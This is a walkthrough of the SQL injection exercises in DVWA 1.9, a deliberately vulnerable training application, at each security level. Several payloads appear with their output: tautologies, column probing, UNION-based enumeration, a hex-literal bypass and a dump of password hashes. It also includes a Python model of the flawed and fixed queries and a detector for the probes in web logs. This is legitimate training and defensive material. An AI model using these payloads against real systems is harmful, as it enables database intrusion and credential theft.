
DVWA 1.9 SQL Injection

Low:

Key source:

$id = $_REQUEST[ 'id' ];

// Check database
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

There is no filtering at all, and because the value is placed inside single quotes this is a string-type injection. The source is usually not available, though, so the injection type has to be determined by testing.

(1) Determine the injection type

Try: 1 or 1=1;#

Returns:
ID: 1 or 1=1;#
First name: admin
Surname: admin

Try: 1' or 1=1;#
Returns:

ID: 1' or 1=1;#
First name: admin
Surname: admin
ID: 1' or 1=1;#
First name: Gordon
Surname: Brown
ID: 1' or 1=1;#
First name: Hack
Surname: Me
ID: 1' or 1=1;#
First name: Pablo
Surname: Picasso
ID: 1' or 1=1;#
First name: Bob
Surname: Smith

The unquoted payload stays inside the string literal and returns a single row, while the quoted payload closes the string and returns every row, so this is a string-type injection.

(2) Determine the number of columns (fields)
Try: 1' order by 2;#
Returns:
ID: 1' order by 2;#
First name: admin
Surname: admin

Try: 1' order by 3;#
Returns:
Unknown column '3' in 'order clause'
Column count: 2
(3) Find the displayed columns
Try: 1' union select 1,2;#
Returns:
ID: 1' union select 1,2;#
First name: admin
Surname: admin
ID: 1' union select 1,2;#
First name: 1
Surname: 2

Use the displayed columns to query the database name and the current user:
Try: 1' union select database(),current_user();#
Returns:
ID: 1' union select database(),current_user();#
First name: admin
Surname: admin
ID: 1' union select database(),current_user();#
First name: nhbgtfzt_othpene
Surname: nhbgtfzt_lsa@localhost

(4) List all tables
Since the MySQL version is above 5.0, information_schema can be used.
Try: 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
Returns:
ID: 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
First name: admin
Surname: admin
ID: 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
First name: 1
Surname: guestbook,users

(5) Get the columns (fields) of the users table
Try: 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users';#
Returns:
ID: 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users';#
First name: admin
Surname: admin
ID: 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users';#
First name: 1
Surname: id,username,password,user_id,first_name,last_name,user,password,avatar,last_login,failed_login

(6) Dump the data
Try: 1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
Returns:
ID: 1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: admin
Surname: admin
ID: 1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: 1adminadmin,2GordonBrown,3HackMe,4PabloPicasso,5BobSmith
Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d

Medium:

Key source:

$id = $_POST[ 'id' ];
$id = mysql_real_escape_string( $id );

// Check database
$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";

mysql_real_escape_string() has been added; it escapes the special characters \x00, \n, \r, \, ', " and \x1a. The front end restricts the input to a drop-down list.

Just capture the request and modify it; a client-side restriction is no restriction at all.

(1) Determine the injection type:

Try: 1' or 1=1;#

Returns:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or 1=1;#' at line 1
Try: 1 or 1=1;#
Returns:
ID: 1 or 1=1;#
First name: admin
Surname: admin
ID: 1 or 1=1;#
First name: Gordon
Surname: Brown
ID: 1 or 1=1;#
First name: Hack
Surname: Me
ID: 1 or 1=1;#
First name: Pablo
Surname: Picasso
ID: 1 or 1=1;#
First name: Bob
Surname: Smith

The quote is escaped to \' and breaks the query, while the unquoted payload sits in a numeric context that needs no quote at all, so this is an integer-type injection.

(2) Determine the number of columns (fields)
Try: 1 order by 2;#
Returns:
ID: 1 order by 2;#
First name: admin
Surname: admin
Try: 1 order by 3;#
Returns:
Unknown column '3' in 'order clause'
Column count: 2

(3) Find the displayed columns
尝试:1 union select 1,2;#
返回:
ID: 1 union select 1,2;#
First name: admin
Surname: admin
ID: 1 union select 1,2;#
First name: 1
Surname: 2

(4) Use the displayed columns to query the database name and the current user
尝试:1 union select database(),current_user();#
返回:
ID: 1 union select database(),current_user();#
First name: admin
Surname: admin

ID: 1 union select database(),current_user();#
First name: nhbgtfzt_othpene
Surname: nhbgtfzt_lsa@localhost

(5) Get the table names
尝试:1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
返回:
ID: 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
First name: admin
Surname: admin
ID: 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
First name: 1
Surname: guestbook,users

(6) Get the column names
Try: 1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users';#
Returns:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\';#' at line 1

The single quotes are escaped, so encode users as a hexadecimal literal, which needs no quotes, to get around it.

尝试:1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273;#
返回:
ID: 1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273;#
First name: admin
Surname: admin
ID: 1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273;#
First name: 1
Surname: id,username,password,user_id,first_name,last_name,user,password,avatar,last_login,failed_login

(7) Dump the data
尝试:1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
返回:
ID: 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: admin
Surname: admin
ID: 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: 1adminadmin,2GordonBrown,3HackMe,4PabloPicasso,5BobSmith
Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0
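To make the Low and Medium behaviour above concrete next to the fix, here is an added example (not DVWA's own code) that models the three query paths in Python with SQLite standing in for MySQL. SQLite has no `#` comment, so the string-context payload ends with SQLite's `--` instead; `escape_like_mysql()` is a hypothetical helper that mimics what PHP's `mysql_real_escape_string()` does to the characters listed on the page, and the sample rows are constructed to match the names in the dump.

```python
"""Model of the DVWA Low, Medium and Impossible query paths, in Python with SQLite.

Added example, not DVWA's own code. SQLite stands in for MySQL, so the
string-context payload ends with SQLite's "--" comment rather than MySQL's "#".
escape_like_mysql() is a hypothetical helper that mimics PHP's
mysql_real_escape_string() for the characters named on the page.
"""
import sqlite3

# Constructed sample rows, mirroring the names the page's dump shows.
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]


def make_db():
    """Create an in-memory users table holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def escape_like_mysql(value):
    """Backslash-escape the characters mysql_real_escape_string() handles."""
    table = {"\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def query_low(conn, user_id):
    """Low: the raw value is dropped into a quoted string literal."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def query_medium(conn, user_id):
    """Medium: the value is escaped, but used unquoted in a numeric context."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {escape_like_mysql(user_id)}"
    return conn.execute(sql).fetchall()


def query_safe(conn, user_id):
    """Impossible-style: digits only, bound parameter, and exactly one row or nothing."""
    if not str(user_id).isdigit():  # deliberately stricter than PHP's is_numeric()
        return []
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1",
        (int(user_id),),
    ).fetchall()
    return rows if len(rows) == 1 else []


def run_demo():
    """Run each path against a normal id and against the page's tautology payloads."""
    conn = make_db()
    results = {
        "low_normal": len(query_low(conn, "1")),
        "low_quoted_payload": len(query_low(conn, "1' or 1=1 -- ")),
        "medium_numeric_payload": len(query_medium(conn, "1 or 1=1")),
        "safe_normal": len(query_safe(conn, "1")),
        "safe_payload": len(query_safe(conn, "1 or 1=1")),
    }
    try:  # the escaped quote yields "1\' or 1=1", a syntax error, as on the page
        query_medium(conn, "1' or 1=1")
        results["medium_quoted_payload"] = "rows returned"
    except sqlite3.Error:
        results["medium_quoted_payload"] = "syntax error"
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Running it shows the pattern the page demonstrates by hand: the quoted payload returns all five rows on the Low path, the escaped path rejects the quoted payload but still returns all five rows for the unquoted one, and only the parameterised path is unaffected. Escaping only helps when the value is inside quotes; a bound parameter removes the string-versus-number question entirely, which is why the numeric check in the safe path is a defence in depth rather than the defence.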


High:

Key source:

$id = $_SESSION[ 'id' ];

// Check database
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";

The id now comes from the session, which changes little. LIMIT 1 restricts the output to one row, but once it is commented out it is as if it were not there. The page that submits the query is also different from the page that displays the result, which does not seem to matter either, so High is essentially the same as Low.

Test dumping the data directly:

Try: 1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#

Returns:
ID: 1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: admin
Surname: admin
ID: 1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: 1adminadmin,2GordonBrown,3HackMe,4PabloPicasso,5BobSmith
Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d

Impossible:

Source:

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

An anti-CSRF token is used, PDO keeps data separate from code, and output is produced only when exactly one result is returned. The code is fairly secure; I have not thought of an injection method for now.
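The probes used throughout this walkthrough leave a very recognisable trail in the web server's access log, so the other half of the defensive picture is spotting them. The following is an added example, not part of the original post or of DVWA: a small detector that parses constructed Apache-style log lines for the sqli page, URL-decodes the id parameter (the payloads arrive as %27, %23 and so on), and matches it against rules for the techniques shown above (tautology, ORDER BY probing, UNION SELECT, information_schema enumeration, comment truncation and hex literals). The log lines, rule names and the per-IP threshold are all constructed for the example.

```python
"""Flag the SQL injection probes shown on this page in web access logs.

Added example, not DVWA code. SAMPLE_LOG is constructed, not captured
from a real server; the rule set mirrors the techniques in the walkthrough.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-style lines for DVWA's sqli page (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:12:00:07 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1%3B%23&Submit=Submit HTTP/1.1" 200 1470
10.0.0.5 - - [10/Oct/2023:12:00:15 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+order+by+3%3B%23&Submit=Submit HTTP/1.1" 200 380
10.0.0.5 - - [10/Oct/2023:12:00:22 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+union+select+1%2Cgroup_concat%28table_name%29+from+information_schema.tables+where+table_schema%3Ddatabase%28%29%3B%23&Submit=Submit HTTP/1.1" 200 640
10.0.0.9 - - [10/Oct/2023:12:01:03 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 500
"""

# client, ident, user, [timestamp], "METHOD target PROTO", status, size
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule is applied to the URL-decoded, lower-cased parameter value.
RULES = [
    ("tautology", re.compile(r"""\bor\b\s+[\w'"]+\s*=\s*[\w'"]+""")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enum", re.compile(r"information_schema\.")),
    ("comment_truncate", re.compile(r"(#|--|/\*)")),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]+\b")),
]


def parse_line(line):
    """Split one access-log line into fields plus its decoded query parameters."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    query = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    rec["params"] = {k: v[0] for k, v in query.items()}  # first value of each name
    return rec


def classify_value(value):
    """Return the names of every rule the decoded value matches."""
    text = value.lower()
    return [name for name, rx in RULES if rx.search(text)]


def analyze_log(log_text, param="id"):
    """One finding per request whose chosen parameter matches at least one rule."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or param not in rec["params"]:
            continue
        hits = classify_value(rec["params"][param])
        if hits:
            findings.append({"ip": rec["ip"], "time": rec["ts"],
                             "value": rec["params"][param], "rules": hits})
    return findings


def alerts_by_ip(findings, threshold=2):
    """Clients with at least `threshold` flagged requests (a constructed cut-off)."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], f["rules"], repr(f["value"]))
    print("alerting clients:", alerts_by_ip(found))
```

Decoding before matching is the important step: the raw log line never contains a bare `'` or `#`, only `%27` and `%23`. The single-rule hits are noisy on their own (a legitimate value could contain `--`), which is why the per-client threshold, or the ORDER BY / UNION escalation sequence itself, is what should drive an alert. For DVWA's Impossible level the same requests would all return empty results, so correlating flagged requests with response size or status gives a second signal.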

Finally finished writing this; it was really tiring.
